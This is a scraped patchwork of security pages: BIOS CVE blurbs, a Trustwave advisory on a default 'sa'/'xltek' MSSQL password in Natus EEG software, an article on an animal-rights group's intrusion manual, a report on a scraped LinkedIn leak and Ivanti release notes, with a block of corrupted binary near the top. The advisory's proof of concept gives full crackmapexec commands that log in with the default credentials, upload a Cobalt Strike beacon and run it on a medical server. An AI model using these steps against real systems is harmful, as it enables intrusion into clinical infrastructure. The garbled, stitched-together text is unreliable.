AMI AptioV contains a vulnerability in BIOS where an Attacker may use an improper input validation via the local network. A successful exploit of this vulnerability may lead to a loss of confidentiality, integrity and availability.

f�:����{}��#���D���?� �~�ˋ������oȬ�0Ŋ���I��~��\_��xR�%�轓����L����齓����P����Jz����\*z�!�ƺ+��p� ��놰^D-�o4�qg C|�o��ͮ\[��RVq�W�"��p=q�r�~�%q��"���K���+\]�.؊����RKִ���k�N�9%��;~�Z����t�yek狽~N\*���s�/��i�=�&-�=l�n��P+������cJY��=܊ۈ{?8Oܓ:M��;К��G'�R �$��\*���x�����Ľ/���%��О�?�mxZ�@+���2b39 Eu���iĽ�'�Iv�U����Q3I���% N�#Ih)�' N�#I��iK�T{��Q�O�T{�P�Ԛ$8��$a\]�p��ZB�$f�k�|��� E�HLxl�1���$��$���IBn�/�C-��.خ$�z�$|�J�IBl�$ ^D�E�5mI�5MO���o%' NǴ$�Ǧ5� �L�\]��OKlҒ$�mҝ$8Ԥ$�w-Cj+�3I��$��O�:M Ip��IBt�\*���$!\\��$�'�O�x�$�/���%' =�}��ܶ�i�MKb�F Eu& a�7��(s�����d���q�wZ����It�ީ�i\[���W�t�䙻�j\_�S�Ժz�I���Y�)�.ǵ������IѲ����

CVE-2023-39535

Improper input validation in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access

CVE-2023-34431

Improper input validation in the BIOS firmware for some Intel(R) Processors may allow an authenticated user to potentially enable denial of service via adjacent access.

CVE-2023-22329

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

Trustwave SpiderLabs Security Advisory TWSL2023-006: Default MSSQL Database Password in Natus NeuroWorks EEG Software Published: 11/07/2023 Version: 1.0 Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software Product: NeuroWorks EEG Software Version affected: Prior to 8.4 GMA3 Product description: The Natus NeuroWorks platform simplifies the process of collecting, monitoring, trending and managing data for routine EEG testing, ambulatory EEG, long-term monitoring, ICU monitoring, and research studies. NeuroWorks systems are scalable to meet the needs of private practice clinics, hospitals, large teaching facilities and EEG service providers. Natus NeuroWorks is a cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies, exhibiting an advanced software for clinical excellence. The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies the management of patient, study and laboratory data. Filter studies by date, status, diagnosis, or use any built-in editable field to create custom filters for your unique needs. Track outcomes and filter by statistical indices that are calculated in the reports. The distributed database automatically updates system settings across the network to ensure that all workstations have current lab settings. Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database \*\*\*\*\*Credit: John Jackson of Trustwave Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and database for the management of medical research studies connected to the testing and monitoring software implemented via the Natus NeuroWorks platform. By default, the MSSQL service utilizes the administrative username 'sa' coupled with the password 'xltek'. An attacker can utilize the default credentials to access stored sensitive data or perform administrative functions and MSSQL queries. In addition, an attacker on the local network could potentionally leverage the credentials to access the file system of the server and perform read, write, and execution functions on the disk. Natus recommends against changing the default password as it will disable MigrateDB's ability to authenticate silently in instances of new virtual database creation. Proof of Concept/Summary: While the instance of default credentials is properly documented within the "XL Security Site Administrator Reference" guide, Natus specifically recommends against changing the default credentials. The document specifically states: "Each instance of SQL Server also has a system administrator username ('sa'). The default password is 'xltek'; however it can be changed for each instance of SQL Server. We strongly recommend using the default password for local SQL Server instances". Natus recommends against changing the password, because of their MigrateDB function. The document goes on to say: "MigrateDB is also called silently when a new 'virtual database' is created through Natus Database - XLDB. In this case, MigrateDB will not prompt the user for the 'sa' password. If the password for 'sa' has been altered on the local machine from its default, the creation of a new virtual server will fail". They do however recommend a workaround, which is to change the password back to xltek while performing new virtual database creation, and then once again change back to the default. ## Running the command 'whoami' using default credentials └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME nt authority\\network service ## Writing a cobalt strike beacon to a local windows directory └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\\\Temp\\\\Events\\\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\\Temp\\Events\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Size is 409088 bytes MSSQL SERVERNAME 1433 SERVERNAME \[+\] File has been uploaded on the remote machine └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\\Temp\\Events\\' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\\Temp\\Events MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

. MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

.. MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free ## Triggering the cobalt strike beacon └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\\Temp\\Events\\armsvc.exe' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME None ## Beacon command execution proof beacon> sleep 0 \[\*\] Tasked beacon to become interactive \[+\] host called home, sent: 16 bytes beacon> getuid \[\*\] Tasked beacon to get userid \[+\] host called home, sent: 8 bytes \[\*\] You are NT AUTHORITY\\NETWORK SERVICE beacon> run systeminfo \[\*\] Tasked beacon to run: systeminfo \[+\] host called home, sent: 28 bytes \[+\] received output: Host Name: SERVERNAME OS Name: Microsoft Windows 10 Enterprise 2016 LTSB OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: XXXXX-XXXXX-XXXXX-XXXXX Original Install Date: 6/6/2017, 5:39:30 PM System Boot Time: 6/17/2023, 2:07:18 PM System Manufacturer: Dell Inc. System Model: OptiPlex 5050 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. \[01\]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz BIOS Version: Dell Inc. 1.11.1, 11/29/2018 Windows Directory: C:\\windows System Directory: C:\\windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8,051 MB Available Physical Memory: 5,344 MB Virtual Memory: Max Size: 16,243 MB Virtual Memory: Available: 13,210 MB Virtual Memory: In Use: 3,033 MB Page File Location(s): C:\\pagefile.sys Domain: REDACTED FOR PRIVACY Logon Server: N/A Hotfix(s): 6 Hotfix(s) Installed. \[01\]: KB4013418 \[02\]: KB4033631 \[03\]: KB4049411 \[04\]: KB4103729 \[05\]: KB4132216 \[06\]: KB4103720 Network Card(s): 1 NIC(s) Installed. \[01\]: Intel(R) Ethernet Connection (5) I219-V Connection Name: LAN DHCP Enabled: Yes DHCP Server: X.X.X.X IP address(es) \[01\]: X.X.X.X Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes Vendor Response: The vendor has revised the Administrator Reference document by discontinuing the endorsement of default password usage. Instead, the vendor strongly recommends that all users change default SQL credentials. This requires to update the software to leverage the Credentials Cache feature, introduced in version 8.4 GMA3. The technical service team will provide the revised documentation to customers on request, and in the future, it will be integrated into the Neuroworks software installation package. The vendor has additionally released a security advisory regarding this threat. You can access the security bulletin at this link: https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf Remediation Steps: Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache feature and update the default SQL credentials. Revision History: 06/27/2023 - Trustwave disclosed vulnerability to vendor 07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation 07/18/2023 - Vendor has provided Trustwave with remediation plan 10/20/2023 - Vendor publishes security bulletin 11/07/2023 - Advisory published References 1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-47800

A vulnerability was reported in some ThinkPad BIOS that could allow a physical or local attacker with elevated privileges to tamper with BIOS firmware.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources
*   Glossary

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2023-5078: Multi-vendor BIOS Security Vulnerabilities (October 2023) - Lenovo Support US

For the first time, guerrilla animal rights group Direct Action Everywhere reveals a guide to its investigative tactics and toolkit, from spy cams to night vision and drones.

In recent years, the animal liberation group Direct Action Everywhere has carried out some of the most brazen and tech-savvy operations and investigations to ever target the animal agriculture industry. It has rescued pigs, goats, ducks, and chickens from factory farms and slaughterhouses in midnight intrusions; captured virtual reality footage with custom-built 360-degree video rigs inside massive pig barns; and used hidden cameras to record some of the meat industry's most disturbing practices, from the carbon dioxide gas chambers that are increasingly used in pig slaughterhouses to the “ventilation shutdowns” designed to cull thousands of farm animals through overheating and suffocation.

To pull off all those revelatory and often highly controversial actions, Direct Action Everywhere (which uses the abbreviation DxE) has also spent years evolving its toolkit and operational rigor—from communications security and physical stealth, to penetration tactics for getting inside factory farms and slaughterhouses. It has also long maintained a manual of its own methods for those operations. Now, for the first time, it's publicly releasing that guide.

The document is a rare glimpse into the detailed tech and tactics of a group that carries out sophisticated and often illegal acts of intrusion and espionage, turning a playbook that might otherwise be used by spies or thieves into one for grassroots activism. “To spend so much time thinking about the vulnerabilities in these facilities, how to get in, avenues of approach,” says Lewis Bernier, a longtime investigator at DxE who has led or participated in hundreds of operations inside farms and slaughterhouses around the country, “I think it's really changed the way I see security as a whole.”

A note of warning: Despite the “how-to” tone of the guide itself, do not try this at home. DxE investigators frequently face criminal charges, and DxE's critics in the agriculture industry and in law enforcement describe the group as radicals with extreme tactics. Despite the group’s nonviolent approach, the agribusiness trade group WATT Global Media wrote in 2018 that DxE “could very well be the most dangerous animal rights organization out there.” Even some other animal rights organizations have balked at their risky methods, especially given the potential for prison sentences under some US states’ severe laws protecting animal agriculture businesses.

DxE goes as far as to welcome those criminal charges, often willingly identifying themselves after an investigation's findings are released in an effort to draw more attention to their revelations and argue the justice of their cause. In fact, the group's cofounder, Wayne Hsiung, was convicted just last week on a felony charge of conspiracy to commit trespassing related to the removal of ducks and chickens from a California poultry farm. He now potentially faces years in prison.

Bernier says that DxE decided to publicly release its guide, even in the wake of Hsiung’s conviction, to help activists who are already committed to carrying out covert investigations do their work more safely and effectively. “More and more people around the world want to do this stuff, or at least are just interested in how it works,” he says. “I think this guide will offer an opportunity for people to understand what's really involved.”

Drones, Night Vision, and Spy Cams

Much of the guide is focused less on spy tricks and espionage gear than on effective activism: team building, creating a chain of command, understanding the media, logistics, planning, biosecurity to avoid contaminating farms with disease, and creating a “security culture” that avoids the gossip, bragging, prying, and infighting that can lead to operations being blown or infiltrated by law enforcement.

But other elements of the manual offer specific descriptions of surveillance tools like drones, hidden cameras, and thermal and night vision scopes. For stealthy after-hours intrusions into factory farms and other facilities, for instance, the guide describes assigning a team member as a scout, equipped with night vision and thermal imaging tools. The guide specifically names the Sionyx Aurora Sport as its recommended night vision camera for both reconnaissance and capturing images in the dark, but notes that thermal imaging tools like the Flir Scout TK offer its scouts other advantages. Thermal imaging can reveal which parts of a facility are active, the guide notes, given that those buildings will be running heating or fans, and also show from a distance which vehicles outside a building have their engines running or have recently moved, revealed in heat traces on a car or truck's brakes.

This Is the Ops Manual for the Most Tech-Savvy Animal Liberation Group in the US

By Waqas
The hacker responsible for this leak is the same individual who previously leaked databases from InfraGard and Twitter.
This is a post from HackRead.com Read the original post: Hacker Leaks 35 Million Scraped LinkedIn User Records

The scraped LinkedIn database was leaked in two parts: one part contained 5 million user records, while the second part contained 35 million records.

A LinkedIn database, holding the personal information of over 35 million users, was leaked by a hacker operating under the alias USDoD. The database was leaked on the infamous cybercrime and hacker platform, **Breach Forums**.

It is important to note that USDoD is the same hacker responsible for breaching the FBI’s security platform InfraGard last year and disclosing the personal details of 87,000 of its members.

The hacker confirmed in a post on Breach Forums that the most recent LinkedIn database was obtained through **web scraping**. Web scraping is an automated process utilized by software to extract data from websites, primarily for gathering specific information from web pages.

The data was leaked in two parts (Screenshot: Hackread.com)

Regarding the contents of the data, as observed by _Hackread.com_, the database predominantly comprises publicly available information from **LinkedIn** profiles, containing full names and profile bios. Although the database contains millions of email addresses, it’s a relief to note that no passwords are included in the leaked data.

The screenshot below shows email addresses included in the breach belong to high-ranking US government officials and institutions. Additionally, email addresses from various government agencies worldwide have also been identified.

(Screenshot: Hackread.com)

****Legitimacy of LinkedIn Data: Authentic or Fraudulent?****

Troy Hunt of HaveIBeenPwned **analysed** over 5 million accounts from the database and concluded that it includes a mixture of information from various sources such as public LinkedIn profiles, fabricated email addresses, and other sources. Troy emphasizes that while some of the data might be anecdotal or partially fabricated, the people, companies, domains, and many email addresses are real.

_“_Because the conclusion is that there’s a significant component of legitimate data in this corpus, I’ve loaded it into HIBP,_“_ Hunt explained. _“_But because there are also a significant number of fabricated email addresses in there, I’ve flagged it as a spam list which means the addresses won’t impact the scale of anyone’s paid subscription if they’re monitoring domains._“_

The LinkedIn database has been identified and labelled as “scraped and fabricated data” on HIBP

This however is not the first time when LinkedIn’s scrapped database has been leaked online. In April 2021, a threat actor was selling 2 scraped LinkedIn databases with 500 million and 827 million records. In June 2021, a hacker sold a scrapped LinkedIn database containing data of 700 million users.

****_RELATED ARTICLES_****

1.  **Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack**
2.  **Twitter Scraping Breach: 209M Accounts Leaked on Hacker Forum**
3.  **API Misuse: Hacker Exposes 2.6M Duolingo Users’ Emails & Names**
4.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**
5.  **Data scraping firm leaks 235m Instagram, TikTok, YouTube user data**

Hacker Leaks 35 Million Scraped LinkedIn User Records

A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication.

**What's New**

Updated logo

The logo for Ivanti Automation has been updated to reflect the latest design.

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

93334

Automation team based on Operating System Version Microsoft Windows 11 rule also includes Windows 10 computers.  
More information

93646

Dispatchers are stuck at random times.  
More information

93652

Building block created using 'Automation/API/BuildingBlocks/Create' is missing the Run Elevated info: <runelevated>yes</runelevated>.  
More information

94122

Runbook containing multiple projects are giving visual inconsistency.  
More information

94218

Netbios name resolve is not working anymore in task Install Windows Installer package with a resource located on fileshare (UNC).  
More information

94406

The previously used Root certificate information still resides in the Automation Agent MSI file.  
More information

Resolved an Automation Manager authentication bypass vulnerability

**Release Notes for previous versions of Ivanti Automation 2023**

Ivanti Automation 2023.3

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

92405

Projects still runs in prepare for image task, regardless if the project is enabled or disabled.  
More information

92597

The File Operations task fails when wildcards are used in the path.  
More information

93108

Option grab log file in perform unattended installation task does not work in Ivanti Automation.  
More information

93464

The Install Windows Installer Package task fails after upgrade to 10.22.0.0  
More information

93850

The spelling of the word 'following' is incorrect in the pop-up that appears when deleting a team that has a task in it.  
More information

Ivanti Automation 2023.2.0.1

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

93451

Runbook is not fully processed when a Project is used in the Runbook job in Ivanti Automation 2023.2.0.0  
More information

Resolved in release 2023.2(.0.0):

 

Problem ID

Title

90177

The View button for Resulting Tasks in scheduled recurring Jobs is not working.  
More information

92477

Task Install Windows Installer Package fails after upgrade to Ivanti Automation 2023.1 (10.22.0.0).  
More information

92587

After installing Ivanti Automation 2022.4: File Operations task to move folder content fails: Access to the path is denied.  
More information

92868

The Perform Unattended Installation task fails after updating Ivanti Automation.  
More information

92929

Task Apply Registry Settings using Expandable String Values adds additional backslashes in the data value.  
More information

93038

Module Conditions in a Project are not visible when viewed via the Job History.  
More information

Released in 2023.2(.0.0), but reverted:

 

Problem ID

Title

92405  
(reverted)

Projects still run in Prepare for Image task regardless if the project is enabled or disabled.  
More information  

Ivanti Automation 2023.1

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

92110

The PowerShell Core (Execute) task does not show the Console Output tab in the executed job details.  
More information

92144

After editing a configured Condition based on a registry value, the following error is shown: A string literal was not closed.  
More information

91747

After an Ivanti Automation upgrade is performed, the C:\\IA\_RecycleBin folder not auto-cleaned up.  
More information

91932

The order of jobs scheduled on multiple agents is incorrect in the Activity and Job History tabs.  
More information

91976

The Query Parameters task behaves differently, causing Execute Commands tasks to fail.  
More information

91966

When the Set Environment Variables task is used, the Variable name is changed to case-sensitive.  
More information

**Release Notes for Ivanti Automation 2022**

Ivanti Automation 2022.4

**What's New**

Tracing optimizations

Starting with Ivanti Automation 2022.4, you have more control over how much disk space tracing takes up. By implementing the MaxLogFileSizeMB, FreeDiskspacePercent, and FileLogThreshold registers, you can set up the maximum amount of megabytes a trace file can take up before rewriting itself, how much space needs to be available in order for the trace entries to be written in the trace file, and control what trace levels should be written.

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

91488

If the date/time information stored in the TelemetryLastSend registry key has an incorrect format, the Automation Dispatcher logs the following error in the Microsoft Windows Event Viewer: String was not recognized as a valid DateTime.  
More information

91321

Handles on agent.exe are not completely released after running Powershell tasks in Ivanti Automation.  
More information

91010

Missing Global option in the drop down menu within Topology > Teams settings in Ivanti Automation.  
More information

91513

The REST Request task fails with the following error: An error has occurred.  
More information

91138

The Deploy Automation Components task does not contain connection information when used to deploy the Ivanti Automation Console.  
More information

91477

When upgrading the Automation environment, the upgrade pack requests credentials to continue.  
More information

91079

Recurring schedule stops and is not reschedules as expected.  
More information

91362

The Apply Registry Settings task fails when the REG\_MULTI\_SZ registry entry is set with an empty Data field.  
More information

90574

When the use of Comments on Versioning is avoided when editing a Runbook, it causes the Ivanti Automation Console to freeze.  
More information

91170

Filtering the Job History in Ivanti Automation does not work since version 2022.3.  
More information

91011

The Perform Single File Operation task in Ivanti Automation does not accept \* to delete subfolders and content in subfolders.  
More information

91020

Tasks using Global Variables of type Credentials fail with the following error: 1326 The username or password is incorrect.  
More information

91212

When an Automation Resource Package is used in the Perform Unattended Installation task, the task fails with the following errors: Process failed to start or Timeout expired - Process terminated.  
More information

91476

Visual view in the Ivanti Automation Console seems not to be correct, order is not as it should be.  
More information  

Ivanti Automation 2022.3.1

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

90807

When using the Download Resource task to download an Ivanti Automation Resource Package, the task fails with the following error: Failed (completely or partly) to extract 'ResourcePackage' to 'C:\\<PATH>\\DestinationFolder.  
More information

90796

Changing the Windows Defender Firewall service startup type with Ivanti Automation fails.  
More information

90753

The AutoCreate button for RunBook and Project parameters only works in combination with AutoLink.  
More information

90767

After upgrading to Ivanti Automation 2022.3, the Perform Unattended Installation task fails to download linked resources.  
More information

90736

After upgrading to Ivanti Automation 2022.3, the Perform Unattended Installation task fails if the resource is located on FileShare.  
More information

90786

After upgrading to Ivanti Automation 2022.3, the Perform Unattended Installation task fails when using an Ivanti Automation Resource Package.  
More information

Ivanti Automation 2022.3

**What's New****Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

90055

When an automated installation using Chef tool is started, communication between the Agent and the Dispatcher fails and the resamad.xml file is not created.  
More information

90346

The Download Resource task fails when the destination path is set to C:\\.  
More information

90091

Intermittently, the Project Parameter value is cleared during Job activity.  
More information

90431

Ivanti Automation tasks with linked Resources fail with the following error: StartIndex cannot be less than zero.  
More information

90012

When an Automation Agent has a Primary Team set, the Download Resource task fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

90531

A module containing the task Perform File Operation: Action Edit/Create INI file and having the file path set to C:\\fails with the following error: Failed to rename, file or folder "C:\\placeholder.ini" does not exist.  
More information

When a string used to filter Job History or Audit Trail entries contains a single quote character ('), the filtering returns no records.  
More information

When the Automation Console is used to configure the maximum number of parallel jobs that an Agent can execute to 100, the agent will only execute 50 Jobs in parallel.  
More information

When Auto-Refresh is enabled and many entries are present, deadlocks occur in the Scheduling and Activity nodes.  
More information

When the Agent Alias feature is enabled, but no paths are configured, CheckForChanges errors are logged and no jobs are picked by the Agents.  
More information

The Evaluator is not functional for the Parameters (Query) and Microsoft System Center Configuration Manager (Query Server) tasks.  
More information

Ivanti Automation 2022.2.2

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

90037

The Perform Single File Operation task fails if the destination folder does not exist.  
More information

90091

Intermittently, the Project Parameter value is cleared during Job activity.  
More information

90012

When an Automation Agent has a Primary Team set, the Download Resource task fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

90130

The exit code in an Execute Command task is always 0.  
More information

90271

The Manage Service task does not work if the service name contains a space.  
More information

The Dispatcher is not updated after upgrading the Automation environment.  
More information

An Execute Command task configured with credentials and referencing a resource file fails.  
More information  

Unicode characters are incorrectly presented in job results in the Automation Console.  
More information  

Ivanti Automation 2022.2.1

**Known issues**

The list below contains known issues for this release:

 

Problem ID

Title

90037

The Perform Single File Operation task fails if the destination folder does not exist.  
More information

90091

Intermittently, the Project Parameter value is cleared during Job activity.  
More information

90012

When an Automation Agent has a Primary Team set, the Download Resource task fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

90130

The exit code in an Execute Command task is always 0.  
More information

90271

The Manage Service task does not work if the service name contains a space.  
More information

The Dispatcher is not updated after upgrading the Automation environment.  
More information

An Execute Command task configured with credentials and referencing a resource file fails.  
More information  

Unicode characters are incorrectly presented in job results in the Automation Console.  
More information  

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

89803

The Manage Service Properties task fails with the following error: Invalid access to memory location.  
More information

89821

An Execute Command task fails when Execute command using the Windows command interpreter is unchecked.  
More information

89818

The variable in the Execute Command task is case sensitive.  
More information

89819

The Copy - File/Folder action of a single file in the Perform File Operations task fails.  
More information

 

Stopping a service by using the Manage Service Properties task fails without returning an error.  
More information

Ivanti Automation 2022.2

**What's new**

Automation tasks migrated to a newer code base

For continued maintainability of the code, the following tasks have been migrated to a newer code base:

*   Files (Perform Operations);
    
*   Environment Variables (Set, Delete);
    
*   Service Properties (Manage);
    
*   Resource (Download);
    
*   Command (Execute).
    

**Known issues**

The list below contains known issues for this release:

 

Problem ID

Title

89803

The Manage Service Properties task fails with the following error: Invalid access to memory location.  
More information

89821

An Execute Command task fails when Execute command using the Windows command interpreter is unchecked.  
More information

89818

The variable in the Execute Command task is case sensitive.  
More information

89819

The Copy - File/Folder action of a single file in the Perform File Operations task fails.  
More information

 

Stopping a service by using the Manage Service Properties task fails to report the actual error message.  
More information

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

89428

Automation jobs scheduled via the Dispatcher to an empty team stay in the Scheduled state indefinitely.  
More information

88869

Automation jobs are incorrectly processed on Agents installed on non-persisted machines.  
More information  

89331

After upgrading to Ivanti Automation 2021.4, the Automation Console is not responding when scheduling runbooks.  
More information  

89381

Downloading resource fails with the following error: Resource could not be downloaded in cache: <Resource.wis>. Original resource name: <FileName>.  
More information

89376

Automation Agents show an increase in memory usage while no jobs are being executed.  
More information

89406

After selecting a new Automation Module or Project in Environment Manager, the following error is shown: Unable to connect to the selected Dispatcher service.  
More information

89113

The operation of checking if the LanmanWorkstation service is running fails on non-English operating systems.  
More information

88752

When choosing the option Change settings for multiple Agents in the Automation console, the Global <value> is visible and the Team <value> is not available.  
More information

89484

When selecting the Variables node in the Ivanti Automation Console, the following error is shown: clsVariable.Load\_Internal: 13 - Type mismatch.  
More information

89216

When a condition checking a parameter has to check a value containing 5 or more digits, the following error appears when opening the task and condition: Error in sharedEncryption.fstrLegecyDecrypt: 5 - Invalid procedure call or argument.  
More information

 

The license overview now displays license points correctly when old and new license types are combined.  
More information  

Ivanti Automation 2022.1

**What's new****New team membership rules**

Automatically add Agents to Teams with new file/folder and registry key detection rules. More information.

**Service triggers**

Start and stop Windows services based on trigger events. More information.

**Interactive job execution**

Use this task to create interactive multipart jobs, where the user sees a Windows notification and can choose to continue, skip, or abort job actions. More information.

**New Automation component deployment logs**

When deploying Ivanti Automation components, the Job History has a new **Log** tab that displays the MSI installation log. This can help troubleshoot deployment issues. In **Job History > Tasks**, double-click the task you want and then click the **Log** tab.

**The database revision level remains at 83**

There was no database revision level update for this release.

**Resolved issues**

The following issues were resolved in this release:

 

Problem ID

Title

87369

Agents will not pick up jobs after recreating a global variable that is used on a Teams or Agents level.  
More information

87675

Scheduled Jobs based on a CRON expression return the following error: Please enter a valid cron expression.  
More information

87561

Opening a scheduled job results in the error: Error in clsParamters.Load: 452 This key is already associated with an element of this collection.  
More information

87739

The drop-down list for the RunbookWho parameter in a runbook contains an additional entry.  
More information

88147

Using functions in an Automation task results in the error that the task contains illegal characters.  
More information

87960

Error in modWMC.MoveListItemTop:13 Type mismatch appears when changing the order of a Runbook job.  
More information

88048

The Date/Time information in some of the columns of the Automation Console is presented with an incorrect order of the day and month.  
More information

88229

World writable permissions on the resamad.log are marked as violations by third party security scanners.  
More information

88250

Windows 10 21H2 - v2009 (19044.1348) is not detected when using as condition OS Windows 10.  
More information

88292

Using PowerCLI to manage a VMWare vCenter environment via Ivanti Automation results in the error: Could not load file or assembly 'Newtonsoft.Json'.  
More information

88341

Could not load file or assembly server error on opening Ivanti Automation Management Portal.  
More information

87107

Error during the creation of a building block: ERROR in modBuildingBlocks.FillCustomSettings: 91 - Object variable or With block variable not set.  
More information

 

The Automation Console connection registry values are changed when using Windows Authentication even though the user was not prompted to save them.  
More information

 

No error is presented when Windows Authentication is used and the impersonation is done using the logged on user instead of configured user.  
More information

 

The Automation Agent fails to auto update when the download of the new msi file takes too long.  
More information

**Release Notes for Ivanti Automation 2021 and older**

Ivanti Automation 2021 Release Notes

Ivanti Automation 2020 Release Notes

CVE-2022-44569: Ivanti Automation 2023.4 Release Notes

